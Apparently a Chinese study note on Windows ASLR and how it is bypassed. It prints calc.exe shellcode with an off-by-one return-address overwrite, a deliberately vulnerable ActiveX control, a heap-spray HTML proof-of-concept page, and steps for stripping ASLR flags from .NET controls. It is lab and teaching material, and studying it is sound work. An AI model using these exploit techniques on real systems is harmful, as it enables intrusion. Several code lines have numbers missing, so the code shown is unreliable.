ASLR,Address Space Layout Randomization,通过加载程序的时候不再使用固定的基址,从而干扰 shellcode 定位的一种保护机制,包括映像随机化、堆栈随机化、PEB 与 TEB 随机化。ASLR 的实现也需要程序和操作系统的双重支持,但程序的支持不是必须的。
ASLR 在 XP 时代已经提出来了,但 XP 上的 ASLR 功能有限,只是对 PEB 和 TEB 进行简单的随机化处理。直到 Windows Vista 出现之后 ASLR 才真正发挥作用。
支持 ASLR 的程序会在 PE 头中设置 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识。VS 2005 SP1 开始加入了 /dynamicbase 链接选项来支持 ASLR(Project - project Properties - Configuration Properties - Linker - Advanced - Randomized Base Address)。
映像随机化
对程序映像的虚拟地址进行随机处理,这个地址是在系统启动时确定的,重启后会变化。映像随机化可以通过注册表来设置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages
DWORD: Disabled
DWORD: - Force Enabled
DWORD: other Normal
映像随机化使得通过的跳板指令无效。但映像随机化只对加载基址的前两个字节做了随机处理,各模块入口点的低位 2 字节不变。
堆栈随机化
堆栈随机化中,其基址是在每次加载程序时确定的。
jmp esp 和 heap spray 的运用使得堆栈随机化对溢出利用的影响有限。
PEB、TEB 随机化
XP SP2 中引入 PEB、TEB 的随机化,在此之前固定基址: PEB:0x7FFDF000,TEB:0x7FFDE000,获取当前 PEB 和 TEB 的参考代码如下:
#include "stdafx.h" int _tmain(int argc, _TCHAR* argv[])
{
unsigned int teb;
unsigned int peb;
__asm{
mov eax,FS:[0x18]
mov teb,eax
mov eax,dword ptr[eax+0x30]
mov peb,eax
}
printf("peb: %#x\nteb: %#x\n",peb,teb);
getchar();
return ;
}
PEB 和 TEB 随机化效果不是很好,而且溢出利用时还有其它方法获得这两个值。
利用未启用 ASLR 的模块做跳板
ASLR 是安全机制,但不是行业标准,不支持 ASLR 的程序很多。不支持 ASLR 意味着加载基址固定,如果当前进程中有这个一个模块,就可以用它做跳板。
Adobe 在 Flash 10 以后的版本才全面支持 Windows 的安全特性,在那之前一直是个危险的切入点。
书中有一个在 Vista(with flash player 9.0.262)下通过 IE 7.0(with Flash9k.ocx)绕过 ALSR 的例子:Flash9k.ocx 中没有 jmp esp 跳板,而上下文中指向栈中的只有 esp、edx、esi,能用的只有 jmp esi 了。但此时 esi 指向栈顶,栈顶的 jmp esi 跳板地址会被译成指令执行。而例子中合适的 jmp esi 指令的地址译为指令后,将会对 eax 指向的位置进行读操作,所以要先调整 eax。而调整 eax 用的跳板面临同样的问题:指令地址等效的代码不能影响 shellcode 的执行。
Off-by-One 技术攻击 ASLR
ASLR 对映像随机化时,只对加载基址的高位 2 字节做了地址随机化,因此可以利用 memcpy()、strcpy() 等进行 Off-by-One 攻击:只要寻找当前模块的踏板,并将跳板低 2 位地址覆盖到返回地址中,就可以溢出成功。
下面的例子演示了这个思路(之前的 shellcode 在 win7 上使用不了,其 LoadLibraryA() 函数出错,具体原因还没调。这里借用了 SkyLined 的弹出 calc.exe 的 shellcode,所有 32/64 bit Windows 版本通用,能够恢复栈帧,赞一个)。
// aslr_offbyone.cpp : Defines the entry point for the console application.
// env:
// * Win 7
// * VS2008 : GS off / Optimization off / DEP off #include "stdafx.h" char shellcode[]=
"\x50\x54\x58\x66\x83\xE4\xF0\x50\x31\xC0\x40\x92\x74\x4F\x60\x4A"
"\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64\x8B\x72\x30\x8B\x76"
"\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F"
"\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x42"
"\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0\x8B\x74\x1F\x1C\x01"
"\xFE\x03\x3C\xAE\xFF\xD7\x58\x58\x61\x5C\x92\x58\xC3\x50\x51\x53"
"\x56\x57\x55\xB2\x60\x68\x63\x61\x6C\x63\x54\x59\x48\x29\xD4\x65"
"\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD\x48\x8B\x30"
"\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
"\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C"
"\x07\x57\x69\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34"
"\xAE\x48\x01\xF7\x99\xFF\xD7\x48\x83\xC4\x68\x5D\x5F\x5E\x5B\x59"
"\x5A\x5C\x58\xC3" // 196 bytes of calc.exe shellcode
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x38\x10" // 0x****1038 point to call eax in main()
; char * test()
{
char buf[];
memcpy(buf,shellcode,++);
return buf;
} int _tmain(int argc, _TCHAR* argv[])
{
test();
_asm call eax // eax contains buf[] returns from test
return ;
}
Heap Spray 攻击 ASLR
Heap Spray 是为了应对堆空间的随机化而产生的技术,ASLR 本质也是随机化处理,Heap Spray 也能应对 ASLR 保护。
Heap Spray 是攻击浏览器的技术,实验前先生成含有漏洞的浏览器 ocx 控件:MFC ActiveX Control 控件函数代码如下。
// CvulCtrl message handlers
// env:
// * windows xp sp3
// * visual studio 2008 mfc activex control
// optimization off, GS off
// use mfc in static library, use unicode charset
// build: release
//
void CvulCtrl::test(LPCTSTR str)
{
//AFX_MANAGE_STATE(AfxGetStaticModuleState()); // TODO: Add your dispatch handler code here
printf("bookmark\n");
__asm{
push eax;
mov eax,0x20141104
pop eax
}
char dest[];
sprintf(dest, "%s", str);
}
上述代码的第 14~19 行是调试 OllyDbg 时帮助定位的。第 11 行如果不注释的话,生成的控件在第 21 行执行完后会进行某种验证(SXS:%s called with invalid cookie type 0x........),会导致溢出实验失败。
溢出的 PoC 页面如下(Windows XP sp3 (/NOEXECUTE=OptIn) with IE7):
<html>
<body>
<object classid="clsid:DB30502B-1297-470B-A487-5D2D23967AA3" id="test"></object>
<script>
var shellcode="\u68FC\u0A6A\u1E38\u6368\uD189\u684F\u7432\u0C91";
shellcode+="\uF48B\u7E8D\u33F4\uB7DB\u2B04\u66E3\u33BB\u5332";
shellcode+="\u7568\u6573\u5472\uD233\u8B64\u305A\u4B8B\u8B0C";
shellcode+="\u1C49\u098B\u698B\uAD08\u6A3D\u380A\u751E\u9505";
shellcode+="\u57FF\u95F8\u8B60\u3C45\u4C8B\u7805\uCD03\u598B";
shellcode+="\u0320\u33DD\u47FF\u348B\u03BB\u99F5\uBE0F\u3A06";
shellcode+="\u74C4\uC108\u07CA\uD003\uEB46\u3BF1\u2454\u751C";
shellcode+="\u8BE4\u2459\uDD03\u8B66\u7B3C\u598B\u031C\u03DD";
shellcode+="\uBB2C\u5F95\u57AB\u3D61\u0A6A\u1E38\uA975\uDB33";
shellcode+="\u6853\u6577\u7473\u6668\u6961\u8B6C\u53C4\u5050";
shellcode+="\uFF53\uFC57\uFF53\uF857"; //168b msgbox shellcode var nops=unescape("%u9090%u9090");
while(nops.length<0x100000/2)
nops+=nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode; var memory=new Array();
for(var i=0;i<200;i++)
memory[i]+=nops; var s="\u9090";
while(s.length<54)
s+="\u9090";
s+="\u0c0c\u0c0c"; // exploit return address
//confirm("ready to exploit ..."); // debug
test.test(s);
</script>
</body>
</html>
这个实验中,vul.ocx 的 uuid 填错,折腾了很久才发现。js 中的代码写错,也折腾很久才改好。如果对 js 熟悉点,不至于耽误这么多时间调试……*_*
Hit:
* 调试时可以借助 ocx 中的标记,只要搜索 mov eax,0x20141104 或者 pop eax (用 Ctrl+B 搜)
* 在 Memory 视图中能对内存段设断点(F2),网上还有人提供了一些其它方法,如设置条件断点:点击这里
* 书中有个利用 java applet(jdk<1.5, -target 1.1)进行 Heap Spray 来绕过 ALSR 的例子
为 .NET 控件禁用 ASLR
Alexander Sotirov 在 2008 年的 BlackHat 上披露了 PE 文件是否启用 ASLR 的校验过程:
if ( !(pBinaryInfo->pHeaderInfo->usDllCharacteristics & IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE) &&
!(pBinaryInfo->pHeaderInfo->bFlags & PINFO_IL_ONLY_IMAGE) &&
!(_MnMoveImages == -) )
{
_MiNoRelocate++;
return ;
}
可见只要满足以下任意条件该 PE 文件启用 ASLR
PE 头中含有 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识
IL-ONLY 文件,对 .NET 进行了特殊照顾
_MnMoveImages 值为 -,强制 ASLR
所以,不管是否设置了 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识,含有 IL-ONLY 标识的 .NET 程序/控件都会启用 ASLR。系统验证 .NET 文件是不是 IL-ONLY 的流程如下:
if ( ( (pCORHeader->MajorRuntimeVersion>) || (pCORHeader->MajorRuntimeVersion== && pCORHeader->MinorRuntimeVersion>=) ) &&
(pCONHeader->Flags & COMIMAGE_FLAGS_ILONLY) )
{
pImageControlArea->pBinaryInfo->pHeaderInfo->bFlags |= PINFO_IL_ONLY_IMAGE;
......
}
系统检查一个 .NET 文件是否具有 COMIMAGE_FLAGS_ILONLY 标识前会对该文件的运行时版本进行判断,如果版本号低于 2.5,该文件就不会被认定为 IL-ONLY。
可以用 CFF Explorer 来修改 .NET 文件/控件的 PE 头,去掉 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识,然后将运行版本号改为小于 2.5 就可以。配合之前 DEP 的例子,可以用这样的 .NET 控件绕过 DEP 和 ASLR!